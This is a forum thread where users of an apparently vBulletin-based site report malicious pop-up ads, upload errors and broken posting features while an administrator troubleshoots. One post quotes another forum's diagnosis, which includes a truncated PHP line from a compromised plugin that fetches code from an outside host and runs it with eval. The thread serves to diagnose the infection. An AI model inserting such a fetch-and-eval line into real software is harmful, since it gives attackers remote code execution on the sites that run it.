Pop Ups? Anyone still seeing them?

Some times when I click on a thread to see the new post, the thread opens in a new window and the old window goes to an advertisement. Very annoying.
Tom I tried to upload a JPG and got this message, three times.
Fatal error:
  • File system directory "./attachment_hold/2/1/9" is not writable or cannot be found. Please create this directory; ensure the directory is writable or change the directory setting.
Unable to proceed with save while $errors array is not empty in class vB_DataManager_AttachmentFiledata in ..../includes/class_dm.php on line 849

Never mind it just worked in another thread.:rolleyes:
Reply to thread button doesn't work, also can't post images or videos....copy and/or paste don't work either,n't selectanyting ith riht uttondown ..<--sentences are all chopped up too.

Serious pblems here folks
This is what my work gateway says:

URL: http://tango-deg.com/adnety.com?adTagId=1884d8e0-8fb9-11e6-8eb3-0e855f2e0669&cpm=1&keywords=entertainment&fallbackUrl=adnety.com
Categories: Spam URLs
Virus Name:
Proxy: wp-stl-10
OK, thanks. I think I have enough ammo for now. Once I make new changes I'll let you know and we'll test it again.

Also, do those that have this issue have pop up blockers set to on or off? I just turned mine on (was off).

How to turn on/off... https://www.techsupportall.com/block-pop-ups-chrome-firefox-internet-explorer-edge-browser/

Not that you need to turn it off as I am trying to fix this issue, but if the pop ups are bugging you in the interim...

Thanks for your help!

Consider this from http://www.vbulletin.com/forum/foru...s-problems-and-troubleshooting/4355791-popads (down for maintenance at the time of this post, the below came from google cache, but may not be complete.):


Today, 7:45am

My forum just started getting pop up pages, apparently from popads.net. I've tried many things to get rid of this to no avail so far.

The most common occurrence comes when someone clicks inside the login forms. Also a click on a subforum.

Version 4.2.2 P6 being used and I uploaded the fresh new files, scanned the servers but found nothing. I also "Excluded" popads . net (don't go there) on the Google Analytics Filter page.

Any ideas?

Some info: https://www.analytics-toolkit.com/re...am/popads.net/

Tags: None


  • Join Date: Jan 2002
  • Posts: 54

Today, 11:36am

Hi tempagain,

Had the same problem, found this **** in one of my plugins:

PHP Code:
$config_data = file_get_contents('http://geekube.com/wp-content/uploads/2013/xml.php?a=inner&host=' . $_SERVER['SERVER_NAME']);
strlen($config_data) > 0){ eval($config_data

It was'nt me, it was the one armed man

_________________________________end quote___________
I am consistently getting a message from my ad blocker (malwarebytes) that that a malicious website (adnety.com) is trying to use pop-ups. I tried to upload a PNG screen capture of the message, but I am getting an error.